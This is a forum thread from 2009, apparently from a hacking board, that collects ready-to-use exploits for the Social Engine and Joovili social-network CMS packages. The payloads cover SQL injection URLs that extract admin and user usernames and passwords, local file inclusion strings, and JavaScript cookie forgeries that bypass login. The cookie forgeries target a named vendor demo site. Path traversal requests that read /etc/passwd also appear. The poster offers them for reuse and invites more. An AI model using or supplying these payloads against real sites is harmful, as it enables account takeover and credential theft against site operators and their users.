[Vulnerabilities] CMS for Social Networks


FraiDex
23.01.2009, 00:25
I suggest we use this thread to post vulnerabilities in public engines for social networks. Here are a couple from me:
Social Engine


Social Engine (browse_classifieds.php s) SQL Injection Vulnerability

Exploit:
http://localhost/browse_classifieds.php?s=classified_date%20DESC&v=0&classifiedcat_id=-1+UNION%20SELECT%20concat(admin_username,0x3a,admi n_password),2,3+from+se_admins


Social Engine 2.0 Multiple Local File Inclusion Vulnerabilities
Exploit: http://[site]/admin/admin_header_album.php?global_lang=[LFI]%00
Exploit: http://[site]/admin/admin_header_blog.php?global_lang=[LFI]%00
Exploit: http://[site]/admin/admin_header_group.php?global_lang=[LFI]%00
Exploit: http://[site]/header_album.php?global_lang=[LFI]%00
Exploit: http://[site]/header_blog.php?global_lang=[LFI]%00
Exploit: http://[site]/header_group.php?global_lang=[LFI]%00

Joovili

Joovili 3.1.4 Insecure Cookie Handling Vulnerability
demo admin login:

http://demo.joovili.com/admin

demo user login:

http://demo.joovili.com/

demo staff login:

http://demo.joovili.com/staff/


exploit for user:

javascript:document.cookie = "session_id=real_id; path=/"; document.cookie = "session_logged_in=true; path=/"; document.cookie = "session_username=real_user_name; path=/";


for demo user:

javascript:document.cookie = "session_id=304; path=/"; document.cookie = "session_logged_in=true; path=/"; document.cookie = "session_username=demo; path=/";

for demo admin:

javascript:document.cookie = "session_admin_id=1; path=/"; document.cookie = "session_admin_username=admin; path=/"; document.cookie = "session_admin=true; path=/";

for demo staff:

javascript:document.cookie = "session_staff_id=3; path=/"; document.cookie = "session_staff_username=staff; path=/"; document.cookie = "session_staff=true; path=/"


Joovili <= 3.0 Multiple SQL Injection Vulnerabilities
http://localhost/[installdir]/search.php

Search Music:

Exploit 1:

'+union+select+1,2,3,concat_ws(0x3a,username,passw ord),5,6,7,8+from+joovili_users/*

Exploit 2:

'+union+select+1,2,3,concat_ws(0x3a,admin_username ,admin_password),5,6,7,8+from+joovili_admins/*


Exploit 1:

http://localhost/[installdir]/view.blog.php?id='+union+select+1,2,concat_ws(0x3a ,username,password),user(),version(),6+from+joovil i_users/*

Exploit 2:

http://localhost/[installdir]/view.blog.php?id='+union+select+1,2,concat_ws(0x3a ,admin_username,admin_password),user(),version(),6 +from+joovili_admins/*

Exploit 1:

http://localhost/[installdir]/view.event.php?id='+union+select+1,2,concat_ws(0x3 a,username,password),4,5,6,7,8,9,10,11,12,13,14,15 +from+joovili_users/*

Exploit 2:

http://localhost/[installdir]/view.event.php?id='+union+select+1,2,concat_ws(0x3 a,admin_username,admin_password),4,5,6,7,8,9,10,11 ,12,13,14,15+from+joovili_admins/*


http://localhost/[installdir]/view.group.php?id='+union+select+1,2,user(),4,5,6, 7,8,9/*
http://localhost/[installdir]/view.music.php?id='+union+select+1,2,3,version(),5 ,6,7,8/*
http://localhost/[installdir]/view.picture.php?id='+union+select+1,user(),3,4,5, 6,7/*
http://localhost/[installdir]/view.video.php?id='+union+select+1,2,3,user(),5,6, 7,8/*


Joovili 3.1 (browse.videos.php category) SQL Injection Vulnerability
[<>] Explo!t :

[<>] 1 ====>http:hacker_egy/browse.videos.php?category=-1/**/union/**/select/**/1,2,3,concat_ws(0x3a3a,admin_username,admin_passwo rd),5,user(),7,8,9/**/from/**/joovili_admins/*

[<>] 2 =====>http://hacker_egy/browse.videos.php?category=-1/**/union/**/select/**/1,2,3,concat_ws(0x3a3a,id,username,password,email) ,5,user(),7,8,9/**/from/**/joovili_users/*

Joovili <= 3.0.6 (joovili.images.php) Remote File Disclosure Vulnerability
version: 2.***
include/images.inc.php?picture=../../../../../../../../etc/passwd&thumbnail=FALSE
include/images.inc.php?picture=../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd&thumbnail=FALSE

version 3.**
joovili.images.php?picture=../../../../../../../..///etc/passwd&thumbnail=FALSE
joovili.images.php?picture=../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd&thumbnail=FALSE

(c) milw0rm.com